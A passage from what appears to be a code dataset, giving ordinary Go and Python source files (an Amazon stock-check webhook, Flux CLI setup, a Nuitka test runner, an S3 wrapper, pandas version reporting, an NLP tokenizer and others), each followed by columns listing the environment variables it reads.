log.Printf("target URL empty.")
return
}
log.Print(targetUrl)
client := &http.Client{}
req, err := http.NewRequest("GET", targetUrl, nil)
if err != nil {
log.Fatalln(err)
}
userAgent := os.Getenv("USER_AGENT")
if userAgent == "" {
userAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36"
}
req.Header.Set("User-Agent", userAgent)
res, err := client.Do(req)
if err != nil {
log.Fatalln(err)
}
defer res.Body.Close()
doc, err := goquery.NewDocumentFromReader(res.Body)
if err != nil {
log.Fatal(err)
return
}
force := r.FormValue("ping") == "true"
if !force {
title := doc.Find("title").Text()
log.Print(title)
availability := doc.Find("#availability").Text()
availability = strings.TrimSpace(availability)
log.Print(availability)
// "お取り扱いできません" in the availability text means the item is currently unavailable.
r := regexp.MustCompile(`お取り扱いできません`)
if r.MatchString(availability) {
log.Printf("在庫なし") // out of stock
return
}
merchantInfo := doc.Find("#merchant-info").Text()
merchantInfo = strings.TrimSpace(merchantInfo)
log.Printf("merchantInfo: %s", merchantInfo)
r = regexp.MustCompile(`Amazon\.co\.jp`)
if !r.MatchString(merchantInfo) {
log.Printf("Amazon 出品ではない")
return
}
}
n, err := notifier.New()
if err != nil {
// log.Fatal would exit the process before the 500 response could be written; log and return instead.
log.Print(err)
w.WriteHeader(500)
return
}
texts := []string{"在庫が復活したかもしれません", targetUrl}
if _, err = n.BroadcastMessage(texts).Do(); err != nil {
log.Fatal(err)
}
}
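// Rough usage sketch (the endpoint path, port and URLs are placeholders; only the
// environment variable names come from the handler above):
//
//	TARGET_URL=https://www.amazon.co.jp/dp/XXXXXXXXXX   // product page to check
//	USER_AGENT="Mozilla/5.0 ..."                         // optional; a desktop Chrome UA is used when unset
//
//	curl "http://localhost:8080/hook?ping=true"          // ping=true skips the stock checks and always notifies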
|
[
"\"TARGET_URL\"",
"\"USER_AGENT\""
] |
[] |
[
"TARGET_URL",
"USER_AGENT"
] |
[]
|
["TARGET_URL", "USER_AGENT"]
|
go
| 2 | 0 | |
terraform/azurerm/vendor/github.com/hashicorp/terraform-provider-azurerm/internal/services/databoxedge/validate/databox_edge_contact_name.go
|
package validate
import (
"fmt"
"regexp"
)
func DataboxEdgeContactName(v interface{}, k string) (warnings []string, errors []error) {
value := v.(string)
if !regexp.MustCompile(`^[\s\S]{3,34}$`).MatchString(value) {
errors = append(errors, fmt.Errorf("%q must be between 3 and 34 characters in length", k))
}
return warnings, errors
}
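// Usage sketch (values are hypothetical): the function follows Terraform's
// SchemaValidateFunc shape and only checks the 3-34 character length rule.
//
//	_, errs := DataboxEdgeContactName("ab", "contact_name")        // too short -> one error
//	_, errs2 := DataboxEdgeContactName("Jane Doe", "contact_name") // 3-34 chars -> no errors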
|
[] |
[] |
[] |
[]
|
[]
|
go
| null | null | null |
cmd/tk/main.go
|
/*
Copyright 2020 The Flux CD contributors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"log"
"os"
"path/filepath"
"time"
"github.com/spf13/cobra"
"github.com/spf13/cobra/doc"
_ "k8s.io/client-go/plugin/pkg/client/auth"
tklog "github.com/fluxcd/toolkit/pkg/log"
)
var VERSION = "0.0.0-dev.0"
var rootCmd = &cobra.Command{
Use: "tk",
Version: VERSION,
SilenceUsage: true,
SilenceErrors: true,
Short: "Command line utility for assembling Kubernetes CD pipelines",
Long: `Command line utility for assembling Kubernetes CD pipelines the GitOps way.`,
Example: ` # Check prerequisites
tk check --pre
# Install the latest version of the toolkit
tk install --version=master
# Create a source from a public Git repository
tk create source git webapp-latest \
--url=https://github.com/stefanprodan/podinfo \
--branch=master \
--interval=3m
# List GitRepository sources and their status
tk get sources git
# Trigger a GitRepository source reconciliation
tk reconcile source git gitops-system
# Export GitRepository sources in YAML format
tk export source git --all > sources.yaml
# Create a Kustomization for deploying a series of microservices
tk create kustomization webapp-dev \
--source=webapp-latest \
--path="./deploy/webapp/" \
--prune=true \
--interval=5m \
--validation=client \
--health-check="Deployment/backend.webapp" \
--health-check="Deployment/frontend.webapp" \
--health-check-timeout=2m
# Trigger a git sync of the Kustomization's source and apply changes
tk reconcile kustomization webapp-dev --with-source
# Suspend a Kustomization reconciliation
tk suspend kustomization webapp-dev
# Export Kustomizations in YAML format
tk export kustomization --all > kustomizations.yaml
# Resume a Kustomization reconciliation
tk resume kustomization webapp-dev
# Delete a Kustomization
tk delete kustomization webapp-dev
# Delete a GitRepository source
tk delete source git webapp-latest
# Uninstall the toolkit and delete CRDs
tk uninstall --crds
`,
}
var (
kubeconfig string
namespace string
timeout time.Duration
verbose bool
utils Utils
pollInterval = 2 * time.Second
logger tklog.Logger = printLogger{}
)
var (
defaultComponents = []string{"source-controller", "kustomize-controller", "helm-controller", "notification-controller"}
defaultVersion = "latest"
defaultNamespace = "gitops-system"
defaultNotification = "notification-controller"
)
func init() {
rootCmd.PersistentFlags().StringVar(&namespace, "namespace", defaultNamespace,
"the namespace scope for this operation")
rootCmd.PersistentFlags().DurationVarP(&timeout, "timeout", "", 5*time.Minute,
"timeout for this operation")
rootCmd.PersistentFlags().BoolVarP(&verbose, "verbose", "", false,
"print generated objects")
}
func main() {
log.SetFlags(0)
generateDocs()
kubeconfigFlag()
if err := rootCmd.Execute(); err != nil {
logger.Failuref("%v", err)
os.Exit(1)
}
}
func kubeconfigFlag() {
if home := homeDir(); home != "" {
rootCmd.PersistentFlags().StringVarP(&kubeconfig, "kubeconfig", "", filepath.Join(home, ".kube", "config"),
"path to the kubeconfig file")
} else {
rootCmd.PersistentFlags().StringVarP(&kubeconfig, "kubeconfig", "", "",
"absolute path to the kubeconfig file")
}
if len(os.Getenv("KUBECONFIG")) > 0 {
kubeconfig = os.Getenv("KUBECONFIG")
}
}
func generateDocs() {
args := os.Args[1:]
if len(args) > 0 && args[0] == "docgen" {
rootCmd.PersistentFlags().StringVarP(&kubeconfig, "kubeconfig", "", "~/.kube/config",
"path to the kubeconfig file")
rootCmd.DisableAutoGenTag = true
err := doc.GenMarkdownTree(rootCmd, "./docs/cmd")
if err != nil {
log.Fatal(err)
}
os.Exit(0)
}
}
func homeDir() string {
if h := os.Getenv("HOME"); h != "" {
return h
}
return os.Getenv("USERPROFILE") // windows
}
|
[
"\"KUBECONFIG\"",
"\"KUBECONFIG\"",
"\"HOME\"",
"\"USERPROFILE\""
] |
[] |
[
"HOME",
"USERPROFILE",
"KUBECONFIG"
] |
[]
|
["HOME", "USERPROFILE", "KUBECONFIG"]
|
go
| 3 | 0 | |
tests/library/compile_python_modules.py
|
#!/usr/bin/env python
# Copyright 2021, Kay Hayen, mailto:[email protected]
#
# Python test originally created or extracted from other peoples work. The
# parts from me are licensed as below. It is at least Free Software where
# it's copied from other people. In these cases, that will normally be
# indicated.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" This test runner compiles all Python files as a module.
This is a test to achieve some coverage, it will only find assertions of
within Nuitka or warnings from the C compiler. Code will not be run
normally.
"""
import os
import sys
# Find nuitka package relative to us.
sys.path.insert(
0,
os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "..")
),
)
# isort:start
import subprocess
import tempfile
from nuitka.tools.testing.Common import (
checkCompilesNotWithCPython,
compileLibraryTest,
createSearchMode,
getPythonArch,
getPythonVendor,
my_print,
setup,
)
from nuitka.utils.Importing import getSharedLibrarySuffix
python_version = setup(suite="python_modules", needs_io_encoding=True)
python_vendor = getPythonVendor()
python_arch = getPythonArch()
search_mode = createSearchMode()
tmp_dir = tempfile.gettempdir()
# Try to avoid RAM disk /tmp and use the disk one instead.
if tmp_dir == "/tmp" and os.path.exists("/var/tmp"):
tmp_dir = "/var/tmp"
ignore_list = (
"__phello__.foo.py", # Triggers error for "." in module name
"idnadata", # Avoid too complex code for main program.
"joined_strings.py",
# Incredible amount of memory in C compiler for test code
"test_spin.py",
# Uses outside modules up the chain
"cheshire_tomography.py",
)
nosyntax_errors = (
# No syntax error with Python2 compileall, but run time only:
"_identifier.py",
"bench.py",
"_tweedie_compound_poisson.py",
"session.py",
)
def decide(_root, filename):
return (
filename.endswith(".py")
and filename not in ignore_list
and "(" not in filename
and filename.count(".") == 1
)
def action(stage_dir, _root, path):
command = [
sys.executable,
os.path.join("..", "..", "bin", "nuitka"),
"--module",
"--output-dir",
stage_dir,
"--remove-output",
"--plugin-enable=pylint-warnings",
]
command += os.environ.get("NUITKA_EXTRA_OPTIONS", "").split()
command.append(path)
try:
subprocess.check_call(command)
except subprocess.CalledProcessError:
if os.path.basename(path) in nosyntax_errors:
my_print("Syntax error is known unreliable with file file.")
else:
my_print("Falling back to full comparison due to error exit.")
checkCompilesNotWithCPython(
dirname=None, filename=path, search_mode=search_mode
)
else:
my_print("OK")
suffix = getSharedLibrarySuffix(preferred=True)
target_filename = os.path.basename(path)[:-3] + suffix
target_filename = target_filename.replace("(", "").replace(")", "")
os.unlink(os.path.join(stage_dir, target_filename))
compileLibraryTest(
search_mode=search_mode,
stage_dir=os.path.join(
tmp_dir,
"compile_library_%s-%s-%s"
% (".".join(python_version), python_arch, python_vendor),
),
decide=decide,
action=action,
)
search_mode.finish()
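# Rough invocation sketch (the extra option is a placeholder, not mandated by this
# script): additional Nuitka flags can be injected via the NUITKA_EXTRA_OPTIONS
# environment variable read in action() above.
#
#   NUITKA_EXTRA_OPTIONS="--show-scons" python tests/library/compile_python_modules.py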
|
[] |
[] |
[
"NUITKA_EXTRA_OPTIONS"
] |
[]
|
["NUITKA_EXTRA_OPTIONS"]
|
python
| 1 | 0 | |
healthchecks.py
|
import requests
import os
import time
API_KEY = os.getenv("HEALTH_BOT_API")
ID = os.getenv("GROUP_ID")
MSG = ""
url = 'https://api.telegram.org/bot' + API_KEY + \
'/sendMessage?chat_id=' + ID + '&parse_mode=Markdown&text='
while True:
# Funny Telegram Bot
try:
requests.get(
"https://hc-ping.com/17445703-16bb-402f-9632-c32ec7f9421d", timeout=30)
MSG += "🟢 FUNNY BOT\n\n"
except requests.RequestException:
MSG += "🔴 FUNNY BOT\n\n"
requests.get(url=(url+MSG))
MSG = ""
time.sleep(3600)
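# Minimal sketch of the environment this loop expects (the values are placeholders;
# only the variable names come from the os.getenv calls above):
#   export HEALTH_BOT_API="123456:ABC-DEF..."   # Telegram bot token
#   export GROUP_ID="-1001234567890"            # chat id that receives the status message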
|
[] |
[] |
[
"HEALTH_BOT_API",
"GROUP_ID"
] |
[]
|
["HEALTH_BOT_API", "GROUP_ID"]
|
python
| 2 | 0 | |
reproserver/objectstore.py
|
import asyncio
import boto3
from botocore.client import Config
import botocore.exceptions
import io
import logging
import os
logger = logging.getLogger(__name__)
def get_object_store():
logger.info("Logging in to S3")
return ObjectStore(
os.environ['S3_URL'],
os.environ['S3_CLIENT_URL'],
os.environ['S3_BUCKET_PREFIX'],
)
class ObjectStore(object):
def __init__(self, endpoint_url, client_endpoint_url, bucket_prefix):
self.s3 = boto3.resource(
's3', endpoint_url=endpoint_url,
aws_access_key_id=os.environ['S3_KEY'],
aws_secret_access_key=os.environ['S3_SECRET'],
region_name='us-east-1',
config=Config(signature_version='s3v4'),
)
self.s3_client = boto3.resource(
's3', endpoint_url=client_endpoint_url,
aws_access_key_id=os.environ['S3_KEY'],
aws_secret_access_key=os.environ['S3_SECRET'],
region_name='us-east-1',
config=Config(signature_version='s3v4'),
)
self.bucket_prefix = bucket_prefix
def bucket_name(self, name):
if name not in ('experiments', 'inputs', 'outputs'):
raise ValueError("Invalid bucket name %s" % name)
name = '%s%s' % (self.bucket_prefix, name)
return name
def bucket(self, name):
return self.s3.Bucket(self.bucket_name(name))
def download_file(self, bucket, objectname, filename):
self.bucket(bucket).download_file(objectname, filename)
def upload_fileobj(self, bucket, objectname, fileobj):
# s3.Object(...).put(...) and s3.meta.client.upload_file(...) do
# multipart uploads which don't work on GCP
self.s3.meta.client.put_object(
Bucket=self.bucket_name(bucket),
Key=objectname,
Body=fileobj,
)
def upload_file(self, bucket, objectname, filename):
with open(filename, 'rb') as fileobj:
self.upload_fileobj(bucket, objectname, fileobj)
def upload_file_async(self, bucket, objectname, filename):
return asyncio.get_event_loop().run_in_executor(
None,
self.upload_file,
bucket, objectname, filename,
)
def upload_bytes(self, bucket, objectname, bytestr):
self.upload_fileobj(bucket, objectname, io.BytesIO(bytestr))
def upload_bytes_async(self, bucket, objectname, bytestr):
return asyncio.get_event_loop().run_in_executor(
None,
self.upload_bytes,
bucket, objectname, bytestr,
)
def create_buckets(self):
missing = []
for name in ('experiments', 'inputs', 'outputs'):
name = self.bucket_name(name)
try:
self.s3.meta.client.head_bucket(Bucket=name)
except botocore.exceptions.ClientError:
missing.append(name)
if missing:
logger.info("The buckets don't seem to exist; creating %s",
", ".join(missing))
for name in missing:
self.s3.create_bucket(Bucket=name)
def presigned_serve_url(self, bucket, objectname, filename, mime=None):
return self.s3_client.meta.client.generate_presigned_url(
ClientMethod='get_object',
Params={'Bucket': self.bucket_name(bucket),
'Key': objectname,
'ResponseContentType': mime or 'application/octet-stream',
'ResponseContentDisposition': 'inline; filename=%s' %
filename},
)
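# Usage sketch (the bucket and object names below are illustrative and not part of
# this module; the S3_* environment variables are the ones read above):
#
#   store = get_object_store()
#   store.create_buckets()
#   store.upload_bytes('inputs', 'run-1/input.csv', b'a,b\n1,2\n')
#   url = store.presigned_serve_url('inputs', 'run-1/input.csv', 'input.csv', 'text/csv')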
|
[] |
[] |
[
"S3_BUCKET_PREFIX",
"S3_URL",
"S3_KEY",
"S3_SECRET",
"S3_CLIENT_URL"
] |
[]
|
["S3_BUCKET_PREFIX", "S3_URL", "S3_KEY", "S3_SECRET", "S3_CLIENT_URL"]
|
python
| 5 | 0 | |
pandas/util/_print_versions.py
|
import os
import platform
import sys
import struct
import subprocess
import codecs
import locale
import importlib
def get_sys_info():
"Returns system information as a dict"
blob = []
# get full commit hash
commit = None
if os.path.isdir(".git") and os.path.isdir("pandas"):
try:
pipe = subprocess.Popen('git log --format="%H" -n 1'.split(" "),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
so, serr = pipe.communicate()
except (OSError, ValueError):
pass
else:
if pipe.returncode == 0:
commit = so
try:
commit = so.decode('utf-8')
except ValueError:
pass
commit = commit.strip().strip('"')
blob.append(('commit', commit))
try:
(sysname, nodename, release,
version, machine, processor) = platform.uname()
blob.extend([
("python", '.'.join(map(str, sys.version_info))),
("python-bits", struct.calcsize("P") * 8),
("OS", "{sysname}".format(sysname=sysname)),
("OS-release", "{release}".format(release=release)),
# ("Version", "{version}".format(version=version)),
("machine", "{machine}".format(machine=machine)),
("processor", "{processor}".format(processor=processor)),
("byteorder", "{byteorder}".format(byteorder=sys.byteorder)),
("LC_ALL", "{lc}".format(lc=os.environ.get('LC_ALL', "None"))),
("LANG", "{lang}".format(lang=os.environ.get('LANG', "None"))),
("LOCALE", '.'.join(map(str, locale.getlocale()))),
])
except (KeyError, ValueError):
pass
return blob
def show_versions(as_json=False):
sys_info = get_sys_info()
deps = [
# (MODULE_NAME, f(mod) -> mod version)
("pandas", lambda mod: mod.__version__),
("pytest", lambda mod: mod.__version__),
("pip", lambda mod: mod.__version__),
("setuptools", lambda mod: mod.__version__),
("Cython", lambda mod: mod.__version__),
("numpy", lambda mod: mod.version.version),
("scipy", lambda mod: mod.version.version),
("pyarrow", lambda mod: mod.__version__),
("xarray", lambda mod: mod.__version__),
("IPython", lambda mod: mod.__version__),
("sphinx", lambda mod: mod.__version__),
("patsy", lambda mod: mod.__version__),
("dateutil", lambda mod: mod.__version__),
("pytz", lambda mod: mod.VERSION),
("blosc", lambda mod: mod.__version__),
("bottleneck", lambda mod: mod.__version__),
("tables", lambda mod: mod.__version__),
("numexpr", lambda mod: mod.__version__),
("feather", lambda mod: mod.__version__),
("matplotlib", lambda mod: mod.__version__),
("openpyxl", lambda mod: mod.__version__),
("xlrd", lambda mod: mod.__VERSION__),
("xlwt", lambda mod: mod.__VERSION__),
("xlsxwriter", lambda mod: mod.__version__),
("lxml", lambda mod: mod.etree.__version__),
("bs4", lambda mod: mod.__version__),
("html5lib", lambda mod: mod.__version__),
("sqlalchemy", lambda mod: mod.__version__),
("pymysql", lambda mod: mod.__version__),
("psycopg2", lambda mod: mod.__version__),
("jinja2", lambda mod: mod.__version__),
("s3fs", lambda mod: mod.__version__),
("fastparquet", lambda mod: mod.__version__),
("pandas_gbq", lambda mod: mod.__version__),
("pandas_datareader", lambda mod: mod.__version__),
("gcsfs", lambda mod: mod.__version__),
]
deps_blob = list()
for (modname, ver_f) in deps:
try:
if modname in sys.modules:
mod = sys.modules[modname]
else:
mod = importlib.import_module(modname)
ver = ver_f(mod)
deps_blob.append((modname, ver))
except ImportError:
deps_blob.append((modname, None))
if (as_json):
try:
import json
except ImportError:
import simplejson as json
j = dict(system=dict(sys_info), dependencies=dict(deps_blob))
if as_json is True:
print(j)
else:
with codecs.open(as_json, "wb", encoding='utf8') as f:
json.dump(j, f, indent=2)
else:
print("\nINSTALLED VERSIONS")
print("------------------")
for k, stat in sys_info:
print("{k}: {stat}".format(k=k, stat=stat))
print("")
for k, stat in deps_blob:
print("{k}: {stat}".format(k=k, stat=stat))
def main():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-j", "--json", metavar="FILE", nargs=1,
help="Save output as JSON into file, pass in "
"'-' to output to stdout")
(options, args) = parser.parse_args()
if options.json == "-":
options.json = True
show_versions(as_json=options.json)
return 0
if __name__ == "__main__":
sys.exit(main())
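# Usage sketch: pandas exposes this as pandas.show_versions(); the output file name
# below is only an example.
#
#   import pandas as pd
#   pd.show_versions()                     # print a human-readable report
#   pd.show_versions(as_json="env.json")   # write the same information as JSON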
|
[] |
[] |
[
"LC_ALL",
"LANG"
] |
[]
|
["LC_ALL", "LANG"]
|
python
| 2 | 0 | |
cmd/go_func.go
|
package main
import (
"flag"
"os"
"fmt"
"strings"
"github.com/chris-tomich/go-func/template"
)
func main() {
//TODO: Develop a version that looks at the line of the go:generate directive and, if no type is given, looks at the following line of code.
singularType := flag.String("singular", "[]interface{}", "This is the name of the type contained within the collection.")
collectionType := flag.String("collection", "[]interface{}", "This is the name of the type to extend with map/filter/reduce functionality.")
flag.Parse()
// The package name will be the package declared at the top of this file. For example, in this file it would be "main".
// It does not include the full package location.
packageName := os.Getenv("GOPACKAGE")
fileName := os.Getenv("GOFILE")
extIndex := strings.Index(fileName, ".go")
if extIndex >= 0 {
fileName = fileName[:extIndex]
}
fileName = fileName + "_" + strings.ToLower(*collectionType) + "_generated.go"
replacer := strings.NewReplacer(template.PackageToken, packageName, template.SingularTypeToken, *singularType, template.CollectionTypeToken, *collectionType)
fd, fileOpenErr := os.Create(fileName)
if fileOpenErr != nil {
panic(fileOpenErr)
}
n, fileWriteErr := replacer.WriteString(fd, template.BaseTemplate)
if fileWriteErr != nil {
panic(fileWriteErr)
}
fmt.Printf("%d total replacements made.\n", n)
}
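// Sketch of the go:generate directive this tool is intended to be driven by (the
// type names and the binary name "go-func" are examples, not taken from this file):
//
//	//go:generate go-func -singular=User -collection=Users
//
// go generate sets GOPACKAGE and GOFILE in the environment of the generator, which
// is how the package name and the *_generated.go output filename are derived above.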
|
[
"\"GOPACKAGE\"",
"\"GOFILE\""
] |
[] |
[
"GOFILE",
"GOPACKAGE"
] |
[]
|
["GOFILE", "GOPACKAGE"]
|
go
| 2 | 0 | |
core/nlp.go
|
package core
import (
"bufio"
"fmt"
"math/rand"
"os"
"path/filepath"
"strings"
"github.com/dchest/stemmer/porter2"
"github.com/itsabot/abot/core/log"
"github.com/itsabot/abot/shared/datatypes"
"github.com/itsabot/abot/shared/helpers/timeparse"
)
// classifier is a set of common English word stems unique among their
// Structured Input Types. This enables extremely fast constant-time O(1)
// lookups of stems to their SITs with high accuracy and no training
// requirements. It consumes just a few MB in memory.
type classifier map[string]struct{}
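// For illustration (not part of the original file): entries are keyed by a short
// type prefix ("C" command, "O" object, "PM"/"PF" male/female name) plus the
// lower-cased word, so one map lookup answers each question in O(1):
//
//	c := classifier{"Cbring": {}, "Oflowers": {}, "PFjane": {}}
//	_, isCommand := c["C"+"bring"] // true: "bring" is known as a Command
//	_, isObject := c["O"+"bring"]  // false: "bring" is not known as an Object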
// classifyTokens builds a StructuredInput from a tokenized sentence.
func (c classifier) classifyTokens(tokens []string) *dt.StructuredInput {
var s dt.StructuredInput
var sections []string
for _, t := range tokens {
var found bool
lower := strings.ToLower(t)
_, exists := c["C"+lower]
if exists {
s.Commands = append(s.Commands, lower)
found = true
}
_, exists = c["O"+lower]
if exists {
s.Objects = append(s.Objects, lower)
found = true
}
// Identify the sex of any people being discussed.
var sex dt.Sex
_, exists = c["PM"+lower]
if exists {
_, exists = c["PF"+lower]
if exists {
sex = dt.SexEither
} else {
sex = dt.SexMale
}
person := dt.Person{
Name: t,
Sex: sex,
}
s.People = append(s.People, person)
found = true
}
// If we haven't found a male or male+female name yet, check
// for female.
if sex == dt.SexInvalid {
_, exists = c["PF"+lower]
if exists {
person := dt.Person{
Name: t,
Sex: dt.SexFemale,
}
s.People = append(s.People, person)
found = true
}
}
// Each time we find an object, add a separator to sections,
// enabling us to check for times only along continuous
// stretches of a sentence (i.e. a single time won't appear on
// either side of the word "Jim" or "Bring")
if found || len(sections) == 0 {
sections = append(sections, t)
} else {
switch t {
case ".", ",", ";", "?", "-", "_", "=", "+", "#", "@",
"!", "$", "%", "^", "&", "*", "(", ")", "'":
continue
}
sections[len(sections)-1] += " " + t
}
}
for _, sec := range sections {
if len(sec) == 0 {
continue
}
s.Times = append(s.Times, timeparse.Parse(sec)...)
}
return &s
}
// buildClassifier prepares the Named Entity Recognizer (NER) to find Commands
// and Objects using a simple dictionary lookup. This has the benefit of high
// speed--constant time, O(1)--with insignificant memory use and high accuracy
// given false positives (marking something as both a Command and an Object when
// it's really acting as an Object) are OK. Ultimately this should be a first
// pass, and any double-marked words should be passed through something like an
// n-gram Bayesian filter to determine the correct part of speech within its
// context in the sentence.
func buildClassifier() (classifier, error) {
ner := classifier{}
var p string
if os.Getenv("ABOT_ENV") == "test" {
p = filepath.Join(os.Getenv("ABOT_PATH"), "base", "data",
"ner")
} else {
p = filepath.Join("data", "ner")
}
fi, err := os.Open(filepath.Join(p, "nouns.txt"))
if err != nil {
return ner, err
}
scanner := bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["O"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "verbs.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["C"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "adjectives.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["O"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "adverbs.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["O"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "names_female.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["PF"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
fi, err = os.Open(filepath.Join(p, "names_male.txt"))
if err != nil {
return ner, err
}
scanner = bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
ner["PM"+scanner.Text()] = struct{}{}
}
if err = fi.Close(); err != nil {
return ner, err
}
return ner, nil
}
// buildOffensiveMap creates a map of offensive terms for which Abot will refuse
// to respond. This helps ensure that users are somewhat respectful to Abot and
// her human trainers, since sentences caught by the OffensiveMap are rejected
// before any human ever sees them.
func buildOffensiveMap() (map[string]struct{}, error) {
o := map[string]struct{}{}
p := filepath.Join("data", "offensive.txt")
fi, err := os.Open(p)
if err != nil {
return o, err
}
scanner := bufio.NewScanner(fi)
scanner.Split(bufio.ScanLines)
for scanner.Scan() {
o[scanner.Text()] = struct{}{}
}
err = fi.Close()
return o, err
}
// RespondWithNicety replies to niceties that humans use, but Abot can ignore.
// Words like "Thank you" are not necessary for a robot, but it's important Abot
// respond correctly nonetheless.
func RespondWithNicety(in *dt.Msg) string {
for _, w := range in.Stems {
// Since these are stems, some of them look incorrectly spelled.
// Needless to say, these are the correct Porter2 Snowball stems
switch w {
case "thank":
return "You're welcome!"
case "cool", "sweet", "awesom", "neat", "perfect":
return "I know!"
case "sorri":
return "That's OK. I forgive you."
case "hi", "hello":
return "Hi there. :)"
}
}
return ""
}
// RespondWithHelp replies to the user when he or she asks for "help".
func RespondWithHelp(in *dt.Msg) string {
if len(in.StructuredInput.Commands) != 1 {
return ""
}
if in.StructuredInput.Commands[0] != "help" {
return ""
}
if in.Plugin != nil {
use := randUseForPlugin(in.Plugin)
use2 := randUseForPlugin(in.Plugin)
if use == use2 {
return fmt.Sprintf("Try telling me %q", use)
}
return fmt.Sprintf("Try telling me %q or %q", use, use2)
}
switch len(PluginsGo) {
case 0:
return ""
case 1:
return fmt.Sprintf("Try saying %q", randUse())
default:
use := randUse()
use2 := randUse()
if use == use2 {
return fmt.Sprintf("Try telling me %q", use)
}
return fmt.Sprintf("Try telling me %q or %q", use, use2)
}
}
// RespondWithHelpConfused replies to the user when Abot is confused.
func RespondWithHelpConfused(in *dt.Msg) string {
if in.Plugin != nil {
use := randUseForPlugin(in.Plugin)
use2 := randUseForPlugin(in.Plugin)
if use == use2 {
return fmt.Sprintf("%s You can try telling me %q",
ConfusedLang(), use)
}
return fmt.Sprintf("%s You can try telling me %q or %q",
ConfusedLang(), use, use2)
}
if len(PluginsGo) == 0 {
return ConfusedLang()
}
use := randUse()
use2 := randUse()
if use == use2 {
return fmt.Sprintf("%s How about %q", ConfusedLang(), use)
}
return fmt.Sprintf("%s How about %q or %q", ConfusedLang(), use, use2)
}
// randUse returns a random use from among all plugins.
func randUse() string {
if len(PluginsGo) == 0 {
return ""
}
pluginUses := PluginsGo[rand.Intn(len(PluginsGo))].Usage
if len(pluginUses) == 0 {
return ""
}
return pluginUses[rand.Intn(len(pluginUses))]
}
// randUseForPlugin returns a random use from a specific plugin.
func randUseForPlugin(plugin *dt.Plugin) string {
if plugin.Config.Usage == nil {
return ""
}
return plugin.Config.Usage[rand.Intn(len(plugin.Config.Usage))]
}
// RespondWithOffense is a one-off function to respond to rude user language by
// refusing to process the command.
func RespondWithOffense(in *dt.Msg) string {
for _, w := range in.Stems {
_, ok := offensive[w]
if ok {
return "I'm sorry, but I don't respond to rude language."
}
}
return ""
}
// ConfusedLang returns a randomized response signalling that Abot is confused
// or could not understand the user's request.
func ConfusedLang() string {
n := rand.Intn(4)
switch n {
case 0:
return "I'm not sure I understand you."
case 1:
return "I'm sorry, I don't understand that."
case 2:
return "Uh, what are you telling me to do?"
case 3:
return "What should I do?"
}
log.Debug("confused failed to return a response")
return ""
}
// TokenizeSentence returns a sentence broken into tokens. Tokens are individual
// words as well as punctuation. For example, "Hi! How are you?" becomes
// []string{"Hi", "!", "How", "are", "you", "?"}. This also expands
// contractions into the words they represent, e.g. "How're you?" becomes
// []string{"How", "'", "are", "you", "?"}.
func TokenizeSentence(sent string) []string {
tokens := []string{}
for _, w := range strings.Fields(sent) {
found := []int{}
for i, r := range w {
switch r {
case '\'', '"', ':', ';', '!', '?':
found = append(found, i)
// Handle case of currencies and fractional percents.
case '.', ',':
if i+1 < len(w) {
switch w[i+1] {
case '0', '1', '2', '3', '4', '5', '6', '7', '8', '9':
continue
}
}
found = append(found, i)
i++
}
}
if len(found) == 0 {
tokens = append(tokens, w)
continue
}
for i, j := range found {
// If the token marker is not the first character in the
// sentence, then include all characters leading up to
// the prior found token.
if j > 0 {
if i == 0 {
tokens = append(tokens, w[:j])
} else if i-1 < len(found) {
// Handle case where multiple tokens are
// found in the same word.
tokens = append(tokens, w[found[i-1]+1:j])
}
}
// Append the token marker itself
tokens = append(tokens, string(w[j]))
// If we're on the last token marker, append all
// remaining parts of the word.
if i+1 == len(found) {
tokens = append(tokens, w[j+1:])
}
}
}
// Expand contractions. This isn't perfect and doesn't need to be to
// fulfill its purpose, which is fundamentally making it easier to find
// times in a sentence containing contractions.
for i, t := range tokens {
switch t {
case "s":
tokens[i] = "is"
case "re":
tokens[i] = "are"
case "m":
tokens[i] = "am"
case "t":
tokens[i] = "not"
case "ve":
tokens[i] = "have"
case "ll":
tokens[i] = "will"
case "d":
tokens[i] = "would"
}
}
log.Debug("found tokens", tokens)
return tokens
}
// StemTokens returns the porter2 (snowball) stems for each token passed into
// it.
func StemTokens(tokens []string) []string {
eng := porter2.Stemmer
stems := []string{}
for _, w := range tokens {
if len(w) == 1 {
switch w {
case "'", "\"", ",", ".", ":", ";", "!", "?":
continue
}
}
